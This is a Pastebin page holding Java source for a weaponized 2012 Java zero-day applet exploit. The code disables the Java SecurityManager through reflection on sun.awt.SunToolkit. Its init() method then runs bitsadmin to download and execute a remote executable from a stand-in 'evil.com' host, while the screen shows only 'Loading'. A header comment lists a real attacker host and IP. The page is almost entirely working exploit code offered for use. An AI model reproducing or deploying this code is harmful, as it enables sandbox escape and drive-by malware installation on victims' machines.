API tools faq
paste
Advertisement
infodox

CVE-2012-XXXX Java 0day PoC

infodox
Aug 27th, 2012
1,638
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Java 2.80 KB | None | 0 0
raw download clone embed print report
  1. //
  2. // CVE-2012-XXXX Java 0day
  3. //
  4. // reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
  5. //
  6. // secret host / ip : ok.aa24.net / 59.120.154.62
  7. //
  8. // regurgitated by jduck
  9. //
  10. // MSF module available
  11. //
  12. // This was my attempt at weaponizing the PoC - infodox
  13. // Have fun...
  14. //
  15. package cve2012xxxx;
  16.  
  17. import java.applet.Applet;
  18. import java.awt.Graphics;
  19. import java.beans.Expression;
  20. import java.beans.Statement;
  21. import java.lang.reflect.Field;
  22. import java.net.URL;
  23. import java.security.*;
  24. import java.security.cert.Certificate;
  25.  
  26. public class Gondvv extends Applet
  27. {
  28.  
  29.     public Gondvv()
  30.     {
  31.     }
  32.  
  33.     public void disableSecurity()
  34.         throws Throwable
  35.     {
  36.         Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
  37.         Permissions localPermissions = new Permissions();
  38.         localPermissions.add(new AllPermission());
  39.         ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
  40.         AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
  41.             localProtectionDomain
  42.         });
  43.         SetField(Statement.class, "acc", localStatement, localAccessControlContext);
  44.         localStatement.execute();
  45.     }
  46.  
  47.     private Class GetClass(String paramString)
  48.         throws Throwable
  49.     {
  50.         Object arrayOfObject[] = new Object[1];
  51.         arrayOfObject[0] = paramString;
  52.         Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
  53.         localExpression.execute();
  54.         return (Class)localExpression.getValue();
  55.     }
  56.  
  57.     private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
  58.         throws Throwable
  59.     {
  60.         Object arrayOfObject[] = new Object[2];
  61.         arrayOfObject[0] = paramClass;
  62.         arrayOfObject[1] = paramString;
  63.         Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
  64.         localExpression.execute();
  65.         ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
  66.     }
  67.  
  68.     public void init()
  69.     {
  70.         try
  71.         {
  72.             disableSecurity();
  73.             Process localProcess = null;
  74.             localProcess = Runtime.getRuntime().exec("bitsadmin /transfer myjob /download /priority high http://evil.com/lulz.exe c:\lulz.exe&start lulz.exe");
  75.             if(localProcess != null);
  76.                localProcess.waitFor();
  77.         }
  78.         catch(Throwable localThrowable)
  79.         {
  80.             localThrowable.printStackTrace();
  81.         }
  82.     }
  83.  
  84.     public void paint(Graphics paramGraphics)
  85.     {
  86.         paramGraphics.drawString("Loading", 50, 25);
  87.     }
  88. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!